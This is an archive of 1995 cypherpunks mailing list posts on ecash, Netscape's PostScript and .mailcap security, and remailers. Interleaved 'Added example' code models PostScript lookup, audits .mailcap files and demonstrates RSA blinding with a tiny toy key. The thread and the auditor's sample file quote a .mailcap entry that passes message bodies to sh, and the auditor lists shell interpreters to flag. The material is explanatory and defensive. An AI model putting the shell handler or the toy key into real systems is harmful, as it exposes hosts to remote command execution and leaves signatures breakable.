Date: Mon, 23 Oct 95 18:04:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510240020.RAA24876@infinity.c2.org>
Message-ID: <199510240103.AA24584@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text


> 
> 	With the release of digicash I hope that we can soon make this
> stuff for-pay and much of the spam problem will be fixed. (Not all of
> it, of course.)
> 	(I am rather hesitant to setup an account with Mark Twain
> though.. $2,500 min balance and not FDIC insured?)
> 

It also sez that a maintenance fee of $10 (or so) will be imposed if the
account has less than $250, so why not set up the account and deposit
$2500 and then withdraw $2200 leaving $300 ?

Or would that be "wrong" <g>

Regards,
 -AJ-



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 23 Oct 95 18:06:13 PDT
To: cypherpunks@toad.com
Subject: Similar Lists
Message-ID: <199510240105.CAA23370@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Looking for recommendations for any other mailing lists which allow one to stay current, on similar topics...

Thanks,
KTO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Tue, 24 Oct 95 05:19:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510240734.AAA23451@jobe.shell.portal.com>
Message-ID: <308CD9B4.23F20F8F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com wrote:
> 
> >Those of us who care run our postscript interpreters with all the
> >dangerous commands stripped out,
> 
> Perry, I'll call you on that one, cause you simply can't do it.
> 
> Postscript isn't like any other language around.  Operator names have no
> special significance to the interpreter.  You can't just "strip out"
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC.

You're talking about stripping them out *with PostScript code*, which
is obviously a dangerous proposition (but is still possible if you do
it right, and if systemdict is not read-only as it often is.)

If you strip them out by taking the source to the interpreter and
stripping them out there, then the PostScript code can be as malicious
as it likes; if the interpreter has no access to disk file primitives,
it can't read or write files, period.

If you don't have source to your interpreter, or if your interpreter
is deeply intertwingled with your OS or window system, obviously this
will be harder to do.  So in that case, you can run a different, 
smaller interpreter that you can isolate.  It's not like they aren't
widely available.

Of course, if the hypothetical cracker is going to take advantage of
buffer-overflow bugs in the interpreter to do what they want, then it
doesn't *matter* that it's a PostScript interpreter; at that point, 
it's just another buggy program.

> In Postscript, operator names are simply keys into a LIFO dictionary.
> This makes Postscript different from other languages because you could
> redefine these names if you wanted to.  Stripping something from a
> dictionary doesn't matter because the search sequence is top down.
> 
> If I rewrite an operator name, and put it at the top of the stack, there's
> not anything you can do.
> 
> Gee's Perry, even if you haven't stripped something out, I can rewrite it.
> And the interpreter will find the rewritten version before the version
> that's in your machine.

I think it would be a really good trick to implement disk I/O in
PostScript that will work in an interpreter which didn't provide any
disk I/O routines in systemdict.

> And this is why the Request-For-Comments from the IETF warns:
> 
>    "Postscript is an extensible language, and many, if not most,
>     implementations of it provide their own extensions.  This document
>     does not deal with such extensions explicitly since they constitute
>     an unknown factor ..."
> 
> Is that clearer??  If you thought that you had "safety" cause you stripped
> your interpreter, then you're in trouble, cause that doesn't work.

Of course it works -- if you know what extensions the interpreter you're
running provides and if you've likewise turned off the dangerous ones.

> > but given that Netscape doesn't supply postscript interpreters, it's not
> > really their fault or problem.
> 
> Well, that line might work on those who don't know any better, but that's
> also why the Internet Engineering Task Force (IETF) tries to protect the
> public by suggesting that implementors like Netscape not pass the ball:
> 
>     "The execution of general-purpose PostScript interpreters entails
>      serious security risks, and implementors are discouraged from simply
>      sending PostScript email bodies to "off-the-shelf" interpreters."
> 
> Netscape ignores this suggestion.

How?

As has been pointed out to you, repeatedly, we do not ship a PostScript
interpreter, and Netscape does not come configured to *look* for a
PostScript interpreter of any kind.  When you run it off-the-shelf, and
hand it a PostScript file, it says "I've never heard of this.  What do
you want to do with it?"

Just like it would with a perl script.  Or an awk script.  Or an sh
script.  Or a Microsoft Word document.  Or any other program capable
of file I/O or network connections.

The user picks the interpreter they want to hand the document to.
If anyone ignores this advice you keep repeating, it's the user.
Not us.

> I guess that Netscape simply knows more (or cares less??) than the entire
> collected wisdom of the International contributors who make up the IETF.

Stop, I'm getting chills.

> Gee, there's lotsa wisdom over there at Netscape.

I'm sure we all love you too.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda
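
Added example, not part of either post or of any real interpreter: a toy Python model of the dictionary-stack lookup the two messages argue about. It contrasts shadowing a name, stubbing out `file` from PostScript-level code, and compiling the primitive out of the build; `ToyInterpreter`, the `op_*` functions and the token format are invented for the illustration.

```python
class Undefined(Exception):
    """A name was found in no dictionary on the dictionary stack."""


def op_add(ps):
    b, a = ps.stack.pop(), ps.stack.pop()
    ps.stack.append(a + b)


def op_sub(ps):
    b, a = ps.stack.pop(), ps.stack.pop()
    ps.stack.append(a - b)


def op_pop(ps):
    ps.stack.pop()


def op_def(ps):
    value, key = ps.stack.pop(), ps.stack.pop()
    ps.dict_stack[-1][key[1:]] = value        # writes to the TOP dictionary


def op_file(ps):
    # Stand-in for a disk primitive: records the request, touches no disk.
    ps.disk_requests.append(ps.stack.pop())
    ps.stack.append("<handle>")


SAFE_OPS = {"add": op_add, "sub": op_sub, "pop": op_pop, "def": op_def}
FULL_BUILD = {**SAFE_OPS, "file": op_file}
STRIPPED_BUILD = dict(SAFE_OPS)               # disk primitive compiled out


class ToyInterpreter:
    def __init__(self, build):
        self.systemdict = dict(build)
        self.userdict = {}
        self.dict_stack = [self.systemdict, self.userdict]   # bottom, top
        self.stack = []
        self.disk_requests = []

    def lookup(self, name):
        for d in reversed(self.dict_stack):   # search runs top-down
            if name in d:
                return d[name]
        raise Undefined(name)

    def execute(self, tokens):
        for tok in tokens:
            if isinstance(tok, str) and tok[0] not in "/(":
                value = self.lookup(tok)      # executable name
                if callable(value):
                    value(self)               # native primitive
                elif isinstance(value, list):
                    self.execute(value)       # procedure body
                else:
                    self.stack.append(value)
            else:
                self.stack.append(tok)        # number, /name, (string), [proc]
        return self.stack


def shadowing():
    """A definition higher on the stack wins: 'add' now subtracts."""
    ps = ToyInterpreter(FULL_BUILD)
    return ps.execute(["/add", ["sub"], "def", 5, 3, "add"])


def postscript_level_strip():
    """Stub out 'file' with PostScript-level code, then run a document."""
    ps = ToyInterpreter(FULL_BUILD)
    ps.execute(["/file", ["pop", "(blocked)"], "def"])   # operator's prologue
    ps.execute(["(sample.txt)", "file"])                 # document
    # The stub is one more entry above systemdict; the primitive is still
    # present in this build, so safety rests on the lookup path alone.
    return ps.stack[-1], ps.disk_requests, ps.systemdict.get("file") is op_file


def source_level_strip():
    """Build without the primitive: no name can resolve to disk access."""
    ps = ToyInterpreter(STRIPPED_BUILD)
    try:
        ps.execute(["(sample.txt)", "file"])
        outcome = "ran"
    except Undefined:
        outcome = "undefined"
    ps.stack.clear()
    # A document may define its own /file, but only from the remaining ops.
    ps.execute(["/file", ["pop", 0], "def", "(sample.txt)", "file"])
    return outcome, ps.stack, ps.disk_requests
```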




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 02:32:25 PDT
To: stripes@va.pubnix.com (Josh M. Osborne)
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <9510240929.AA08313@all.net>
MIME-Version: 1.0
Content-Type: text


> In message <9510231413.AA26514@all.net>, Dr. Frederick B. Cohen writes:
> [...]
> >I strongly disagree.  If Netscape provided a way to execute shell
> >commands on your host from a remote computer, it would certainly be a
> >hole created by their product.  The fact that the default shell is
> >potentially dangerous means it's incumbent on those who provide access
> >to it to provide adequate protection.
> 
> They do, add:
> 
> application/x-shell; sh %s
> 
> to your .mailcap.
> 
> They had better stop supporting mailcap altogether, after all *any*
> of the programs in there could have buffer overflows, or other
> security problems.  I'll bet some of them even do, anyone want to
> see if sox (a program that transforms sound files from format to
> format - frequently used to convert .wav files to .au files) has
> any overruns in the chunk handling code?

This is where the difference between your view and mine seem to part company.
I am not talking about some bug in postscript or the shell.  I am talking about
a program that grants remote access to run these programs in the normal manner,
which is unsafe.

To support the position you seem to be taking (and the one currently
taken by Netscape), you would have to say that the last several Sendmail
"bugs" were not sendmail problems but rather shell problems because all
sendmail did was allow you to execute a shell from the remote machine
(perhaps via a queue file).  You would also apparently say that it's
secure to allow a server to grant unlimited shell access to unknown,
unauthenticated remote users.  This seems foolhardy to me.

> >If Netscape wants to claim their product doesn't degrade security, they
> >should provide a safe postscript interpreter or not provide hooks to
> >unsafe ones.
> 
> Sure, and they had better find a way to keep us from editing the binary
> and adding whatever insecure features we may want to their program.

That's correct.  Secure software has to have secure distribution in
order to maintain its security when distributed through an untrusted
channel.  I think that Netscape uses an MD5 checksum which the members
of this list seem to place unlimited trust in (incorrectly in my view,
but that would be picking two nits with one keyboard entry).

> obcrypto: maybe it would be a good idea for programs to list problems that
> are beyond their control.  To many people it may be surprising that anything
> in their .mailcap could hurt them.  To others it is hardly a shock and seeing
> a lot of messages about it tends to get rather boring, esp. as a few people
> jump up and down and yell about the Danger To Us All...

That's not true.  Certain things in their .mailcap file can create
holes, but not just anything.  One of the standard things we do in
external audits is look for files such as this and examine their
contents to see if unsafe configurations are in use. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
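
Added example, not Dr. Cohen's audit tooling: one way to do the .mailcap check he mentions, flagging entries whose view command hands the message body to a general-purpose interpreter. The interpreter list and the sample file (which reuses the `application/x-shell` entry quoted above) are assumptions constructed for this example.

```python
from pathlib import PurePosixPath

# Assumption for this example: programs treated as general-purpose
# interpreters, i.e. able to do file I/O or run commands on their input.
INTERPRETERS = {"sh", "csh", "ksh", "bash", "perl", "awk", "gs", "ghostscript"}

# Constructed sample .mailcap, including a continued line and a pipeline.
SAMPLE_MAILCAP = """\
# constructed sample
image/gif; xv %s
application/x-shell; sh %s
application/postscript; /usr/local/bin/gs \\
    -q %s; description="PostScript document"
audio/*; sox %s -t .au - | \\
    cat > /dev/audio
text/x-awk; awk -f %s
"""


def logical_lines(text):
    """Drop comments and blank lines; join backslash-continued lines."""
    buf = ""
    for raw in text.splitlines():
        if not buf and (not raw.strip() or raw.lstrip().startswith("#")):
            continue
        if raw.endswith("\\"):
            buf += raw[:-1]
            continue
        yield buf + raw
        buf = ""
    if buf:
        yield buf


def split_fields(line):
    """Split on ';' while honouring backslash-escaped characters."""
    fields, cur, i = [], "", 0
    while i < len(line):
        if line[i] == "\\" and i + 1 < len(line):
            cur += line[i + 1]
            i += 2
        elif line[i] == ";":
            fields.append(cur.strip())
            cur = ""
            i += 1
        else:
            cur += line[i]
            i += 1
    fields.append(cur.strip())
    return fields


def audit(text):
    """Return (mime type, program) for every pipeline stage of a view
    command that starts a program from INTERPRETERS."""
    findings = []
    for line in logical_lines(text):
        fields = split_fields(line)
        if len(fields) < 2:
            continue                      # malformed entry, nothing to run
        mime_type, command = fields[0], fields[1]
        for stage in command.split("|"):
            words = stage.split()
            if words:
                program = PurePosixPath(words[0]).name
                if program in INTERPRETERS:
                    findings.append((mime_type, program))
    return findings
```

A finding here only means the entry deserves a closer look; whether a given interpreter is run in a restricted mode has to be read from its arguments.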



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Miszewski <crypto@midex.com>
Date: Mon, 23 Oct 95 21:35:50 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <Pine.3.89.9510240512.A6071-0100000@shaq.midex.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Oct 1995, Douglas Barnes wrote:

> This extremely unprofessional, bungled launch does, I admit, make
> Mondex (with scads of beautiful marketing literature) look better all
> the time, although based on some conversations on Sunday, it appears
> that they may have _extremely serious_ architectural security problems.
> We'll see how things play out.
> 

MT Bank could clearly benefit from a Linux-type of advocacy and support.  
There are oodles of people out there with Desk Top Publishing equipment 
and graphics talents that could help MT/Digicash out.  Why should they?  
Simply, for the benefit of the net (remember that???).

I'm sure some of the folks on the WEBS mailing list could start with a
rehaul of their Web Page.  Let's see if we can get at least some pro bono
design work for marketing materials for real ecash.  Talk it up in the
newsgroups and whatever lists you are on.  Add it to your already too
lengthy <g> .signature.

It does appear a clumsy announcement, but nonetheless, congrats to the 
folks at MT and Digicash for doing their best to make e-commerce a bit 
more safe.


> Later,
> 
> Doug
> 

Matt
--
Go to http://www.digicash.com/ecash.html
then to Mark Twain
then open account
then *spend, spend, spend*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an413572@anon.penet.fi
Date: Tue, 24 Oct 95 00:04:30 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510240654.AA27036@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>>   And if the security bug you find is severe as defined by Netscape, and
>>   hasn't been previously found, and can be reproduced by us, we'll write
>>   you a check for $1000. 
>
>Ha!  I reported a serious problem to Netscape ten days ago, on Thursday
>the twelfth.  They haven't even returned an answer to my email yet nor
>even acknowledged its receipt. 
>
>Yep, I guess that their check is in the mail ....
>
>Alice de 'nonymous ...
Well, maybe if you'd remembered to put a real name on it,
they'd know where to send the check.  And maybe if your
"hacks" were so spectacular, you'd put your real name
on them too...  Now go away, Larry.

>                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
WTF?
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 06:58:19 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
In-Reply-To: <v02120d07acb1f3d69b57@[199.2.22.120]>
Message-ID: <199510241356.GAA01427@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


cman@communities.com (Douglas Barnes) writes:

>A technically-oriented NBFI
>could have done a much better job, without a lot of the "real bank"
>baggage, such as minimum deposits ($250, not $2,500, but still
>pretty steep for someone wanting to spend $.10 on something.)

I don't believe this is correct.  The $250 refers to foreign currency
accounts and is not relevant for ecash users.  The ecash account has an
account opening fee of $11 and a monthly fee of $5 for the low volume
user.  That is all the minimum there is, as I read it.  You can reduce
the per-month fee by paying more up front, but it isn't a net savings
until you've had the account open for about two years.

>My
>understanding is that the _bank account_ is FDIC insured, but not
>the ECash. I could be wrong -- their materials are extremely confusing
>and hard to follow.

It seems that there are three places "your" money can be: in the "World
Currency Access" account, where it is insured; in the "ecash mint", a
separate account at the bank, where it is not insured and in fact is
considered withdrawn (?); and in your ecash wallet on your computer disk.
You can transfer funds back and forth between your wallet and the "mint"
freely, but transfers are limited between the World Currency account and
the "mint" account.  It does seem like an odd approach, but perhaps there
are some legal reasons for doing it like this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 07:12:29 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232023.OAA10038@nag.cs.colorado.edu>
Message-ID: <199510241410.HAA04523@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>Perhaps the problem is that Bob insists that Alice's coin was not signed
>by the bank.  In that case, how about this modification?  Alice should
>first show Bob the doubly blinded coin she gave to the bank and the
>signed doubly blinded coin she received back.  Bob can verify the
>signature and then Alice can give him the blinding factor so he can
>unblind it himself.  Bob also needs to sign the singly blinded coin that
>he gives to Alice so that Alice can later show that she gave him the
>correct blinding factor if Bob tries to claim that she didn't.

The problem with this is that Bob and the bank can now collude to trace
Alice, since he sees what she sent to the bank.  This is not as bad as in
the forward traceability case of regular ecash, because it happens after
Alice has completed her bank transaction, rather than before, but it
would be better to be untraceable since that is the whole point of this
variation.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 24 Oct 95 07:33:15 PDT
To: strick at Jihad <tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
Message-ID: <199510241432.HAA22965@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 AM 10/21/95 +0000, strick at Jihad wrote:
>Tim, a friend comments that if you're serious about getting
>reports this way, you should contact one of the human rights
>groups (Amnesty International, Article 19...) that gathers
>reports which are generally believed to be accurate under
>much more threatening situations.


This opinion of Amnesty is not universally held.

Amnesty has a political agenda, which causes it to overlook certain
kinds of oppression in certain cases.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 24 Oct 95 04:23:59 PDT
To: cypherpunks@toad.com
Subject: Re: Hack DigiCash: Payee Anonymity
In-Reply-To: <199510240750.IAA04175@utopia.hacktic.nl>
Message-ID: <Pine.LNX.3.91.951024071953.149B-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Name Withheld by Request wrote:

> The  <--(blinding)--- payer <--(blinding)--- payee
> Bank --(unblinding)-> payer --(unblinding)-> payee --> payee spends money
> 
> The payee generates some digital coins, blinds them, and sends them to the
> payer.  The payer then makes a withdrawal from his bank account, blinds the
> coins again (or not, it really doesn't matter) and sends them to the bank.

If the payer doesn't add a blinding factor, then the only blinding factor
is the one known to the payee.  The payee could reveal this blinding factor
to the bank, destroying the payer's anonymity.

Right?

> The bank signs them, and returns them to the payer.  The payer removes his
> blinding (if any) and sends them to the payee.  The payee unblinds the
> coins and spends them at his leisure.  Privacy for all involved.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ROBO Anonymous Remailer / Mail Server <robo@c2.org>
Date: Tue, 24 Oct 95 07:29:52 PDT
To: rops@c2.org
Subject: robo remailer
Message-ID: <Pine.SUN.3.91.951024072246.21183A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


robo remailer is functional again
sorry for inconveniences
my account is back up

this remailer will not be shut down
anytime in the foreseeable future

my thanks to sameer
for not deleting the account
while it was inactive
and for maintaining
c2.org



--
ROBO Anonymous Remailer / Mail Server <ROBO@c2.org>    PGP Key = 8717D1DD
    PGP Fingerprint: 08 A6 47 EB A2 C6 02 36  35 9A 0E C4 D9 A7 94 4D
   Send mail with subject: HUMAN to have it redirected to the operator
       Mail with subject: HELP will be replied to with a help file






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Tue, 24 Oct 95 07:25:39 PDT
To: cypherpunks@toad.com
Subject: Re: Re: Reformated: How secure....
Message-ID: <199510241425.HAA20039@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


    Firstly, I would like to thank Cypherpunks members for helping me
evaluate and critique my document on PrivaSoft's security. I would like
to address several of the issues raised on this list.

    1. A lot of questions would be answered if you had a copy of
PrivaSoft to look at or at least a scrambled page to examine. Both of
these are available at our WEB site
(http://www.privasoft.com/privasoft). This is not an advertising plug;
it really helps to see the thing in action to better understand its
capabilities.
    2. Re: the 9 digit key.
        Partially why you misunderstand the strength of the 9 digit key
in PrivaSoft is b/c Graphical Encryption is very different from data
encryption. Graphic encryption takes an image of your document and
scrambles the tiles across the page in a pseudo-random order based
both on the encryption algorithm and the key used. Each key produces a
completely different scramble. Further, descrambling entails moving
tiles and recognition of readable text. An edge detection machine would
not be helpful with PrivaSoft; as far as I know, OCR or human
interface, or the PrivaSoft descrambler (with the correct key) are the
only methods that can be employed. And all three of these take
considerable time. Time is a key factor here (no pun intended). The
strength of an encryption relies heavily on the time it takes to
brute-force check different keys. As such, even the addition of 10
milliseconds to the process is a significant increase in security when
taken on the large scale of how many keys need to be checked.

    3. The key extension is useful when documents are scrambled using
the same default key. This feature adds 2 digits to your key; thus,
even the same exact document scrambled with the same key but a
different key extension would produce a radically different scramble.

    4. With regard to the increased font size, this is not necessary 
but is helpful in that the tiles themselves would contain less 
recognisable features of letters. 

    5. As a fax security product, there is nothing comparable to
PrivaSoft in ease of use, strength, versatility. I'm sure you have all
received faxes that have come in skewed, with heavy line noise, a black
line running across the page, or any other combination of fax problems.
These do not affect PrivaSoft's capability to descramble the fax;
PrivaSoft has several patented features that produce readable text even
after moderate damage to the page. Also, if you haven't figured this
out yet, PrivaSoft is the only encryption software that provides
Hardcopy encryption and decryption, i.e. you can print out a hardcopy of
the scrambled image, and fax it, store it, even snail mail it and then
on the receiving end, fax or scan it back into the pc and decrypt.

    6. re: customization:
        This refers to our capability, for corporate clients and the
like, to produce batch operation or need-specific features. Also we can
increase the digits of the key if the client requires such, as in gov't
agencies etc.; however, this is not necessary for day-to-day use as
PrivaSoft is strong enough for most transmissions over the Net and via
fax regardless of the prevalent comments by many members of this group.
I do not take offence at the many slurs on our product. I fully believe
that those who believe that PrivaSoft is a fly-by-night or
bogus product have not looked at or tried the software and therefore
speak from a less than knowledgeable position. Please do not take this
the wrong way; I do not mean to insult anyone's intelligence or ability.
I just mean to say that many here are quick to judge, and they have a
right to be suspicious of everything and everyone, that is the nature
of security, but I do challenge the naysayers to truly check out the
software before completely condemning its use and capabilities. I have
personally demonstrated our software to several key individuals in the
gov't, military, and corporate arenas, both executive and technical
persons. All were impressed and have taken the software back for further
testing. I have received positive responses from them and many have
recommended / are presently using PrivaSoft.

    Once again, thank you for your help in editing and restructuring
the How secure document and I will post an updated version when it is
ready. Also, if anyone would like a scrambled page E-mailed to them to
look at / try to crack please E-mail me as such; I do not wish to post
one only b/c many of you might not want to receive it. If you have
further questions or comments, I do appreciate and encourage them;
please feel free to E-mail me at privsoft@ix.netcom.com or post them
here.

Steve O.

*************************************************
PrivaSoft TM                                    *
1877 Springfield Ave PO BOX 600                 *
Maplewood NJ 07040-0600                        *
Tel. 201-378-8865  Fax. 201-762-3742            *
Http://www.privasoft.com/privasoft              *
E-mail: privsoft@ix.netcom.com                  *
*************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 07:27:12 PDT
To: cypherpunks@toad.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510240749.RAA07855@sweeney.cs.monash.edu.au>
Message-ID: <199510241425.HAA06922@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
>Hello Hal <hfinney@shell.portal.com>
>H wrote:
>> There could be an issue of fraud, though,
>> where Bob insists that Alice's coin was no good even though it actually
>> was.

>Cut'n'choose between Alice and Bob? Ie Alice asks Bob for half the blinds
>to check that the proto-coins are true?

This would work to protect Alice from certain kinds of fraud by Bob, but
it increases the amount of data considerably, and it still does not
resolve the main issue that Bob claims that his coin didn't unblind to
clean data.  Who is at fault in that case?  How can this be resolved?

>Apart from no-good proto-coins, is there any other way the coin
>could be no good?

Alice could give Bob bogus data, Bob could give Alice bogus data, Bob
could claim that Alice gave him bogus data (even though it was good).

>As for no-good proto-coins, it's Bob's fault, isn't it? Alice has 
>a record of what Bob sent, and what she sent back. Anybody can check
>that the latter is a bank-signed version of the former.

If what she got from Bob was signed by him, she can prove that she gave him
back a bank-signed version of that.  (He has to sign it, otherwise she
could just exhibit two bogus numbers, one the cube of the other.)  Given
that, your idea seems good.  Alice can prove that she did her part OK, so
if she is able to show such a proof then Bob must be at fault.

>Given this,
>there's no need (from this) for Alice to know that the proto-coins are
>good (if they aren't, Bob's an idiot, but there's not much Alice
>can do about it - I guess given all the blinding factors the bank
>could replace the coin, seeing that it signed a worthless one).

Yes, I think so, so there is no need for the cut and choose.

>An interesting question is whether Bob and Nick can now collude to
>expose Alice. Therefore Alice would at least want to verify that the
>proto-coins are true? Would that suffice? Or is that not necessary?

I don't think they can.  All Bob sees is his own blinded coin, and the
signed version of that.  The bank sees a separately blinded number which
it signed.  Alice's blinding factor can be anything, so there is no
linkage between them.

However, the timing is a problem.  Bob knows _when_ Alice communicated
with the bank.  So he can collude with the bank afterwards to identify
those withdrawals which took place at that time, one of which must have
been Alice.  This could be a problem.

In regular ecash, the timing issue is potentially less serious because
the payee can in principle have a totally anonymous relationship to the
bank, and exchange his received coins for fresh ones.  But in this
system doing that is more difficult.  Alice must withdraw funds rather
than deposit them.  To do so totally anonymously she would have to
present coins to the bank at withdrawal time equal in value to the
amount she wanted to pay Bob.  The bank would replace these coins with
fresh ones that it signs, which are the doubly-blinded ones which Bob
has provided to Alice.  So this is a somewhat more roundabout
approach.  However, if you do this, and Alice communicates with the
bank anonymously, then both sides seem to be pretty well protected
against collusion.

Hal
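
The doubly blinded withdrawal discussed in this thread, together with David R. Conrad's point about a payer who adds no blinding, as an added example (not code from any poster or from DigiCash). It uses textbook RSA blinding with a constructed toy key; all function names and the key are assumptions of the example.

```python
import math
import secrets

# Toy bank key, constructed for this example and far too small for real use.
# e = 3 matches the thread's remark about one number being the cube of another.
P, Q, E = 104729, 65537, 3
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))        # bank's private exponent


def random_unit():
    """Random value in 2..N-1 that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            return r


def blind(x, r):
    return x * pow(r, E, N) % N


def unblind(s, r):
    return s * pow(r, -1, N) % N


def bank_sign(x):
    return pow(x, D, N)


def verify(x, s):
    """Public check: s is the bank's signature on x if s^e == x (mod N)."""
    return pow(s, E, N) == x % N


def run_protocol(payer_blinds=True):
    coin = random_unit()                  # Bob's coin (a real one is hashed/padded)
    r_bob = random_unit()
    proto = blind(coin, r_bob)            # Bob -> Alice: singly blinded coin
    r_alice = random_unit() if payer_blinds else 1
    to_bank = blind(proto, r_alice)       # Alice -> bank: doubly blinded coin
    signed = bank_sign(to_bank)           # bank -> Alice
    for_bob = unblind(signed, r_alice)    # Alice -> Bob
    if not verify(proto, for_bob):        # the pair Alice keeps for a dispute
        raise ValueError("bank returned a bad signature")
    coin_sig = unblind(for_bob, r_bob)    # Bob's spendable signature
    return {"coin": coin, "coin_sig": coin_sig,
            "proto": proto, "to_bank": to_bank}


def seen_by_bank(proto, bank_log):
    """What Bob and the bank can test if they pool their records."""
    return proto in bank_log


def consistent_factor(proto, log_entry):
    """Blinding factor that would turn proto into log_entry (uses the bank's d)."""
    return pow(log_entry * pow(proto, -1, N) % N, D, N)


def unsigned_pair():
    """A (value, 'signature') pair made with no bank at all: pick y, cube it."""
    y = random_unit()
    return pow(y, E, N), y


if __name__ == "__main__":
    t = run_protocol(payer_blinds=True)
    print("coin verifies:", verify(t["coin"], t["coin_sig"]))
    print("linkable with payer blinding:", seen_by_bank(t["proto"], [t["to_bank"]]))
    u = run_protocol(payer_blinds=False)
    print("linkable without payer blinding:", seen_by_bank(u["proto"], [u["to_bank"]]))
```

Every entry in the bank's log has a consistent blinding factor, so the blinded values alone single out no withdrawal; the timing correlation raised in the message above is outside what this models.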




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 24 Oct 95 07:29:50 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <DGxxGM.IHu@sgi.sgi.com>
Message-ID: <199510241429.HAA02508@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGxxGM.IHu@sgi.sgi.com>, Jiri Baum <jirib@sweeney.cs.monash.edu.au> writes:
> TW writes:

>> I agree.  Sending your cc# to a key or an IP address is not what you
>> want to do.  As a consumer, I want to make sure that I send my cc# to
>> the merchant I am buying from.

> But how do you know that you want to send to Egghead Software in the
> first place? EHS could be a MIMT, maybe you really want to talk to
> Eggfoot Software, but every e-mail Eggfoot sends out is intercepted
> and changed to read "Egghead" (and vice versa)...

> By the time you verify that Egghead is who you want, you could have just
> as easily verified that the key is who you want. Thus skipping one step
> and avoiding all the attacks applicable to that step.

That's true.  You really want to make sure that the merchant you are
giving your money to is the one who has the goods you are interested in.
Perhaps the only way to solve this problem is with some sort of trusted
escrow agency.  The agency would be well known and its reputation could
be verified fairly easily.  Of course there's still the existential
problem of how do you know your connection to the rest of the world
isn't controlled by someone else, but there's really no solution to
that.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




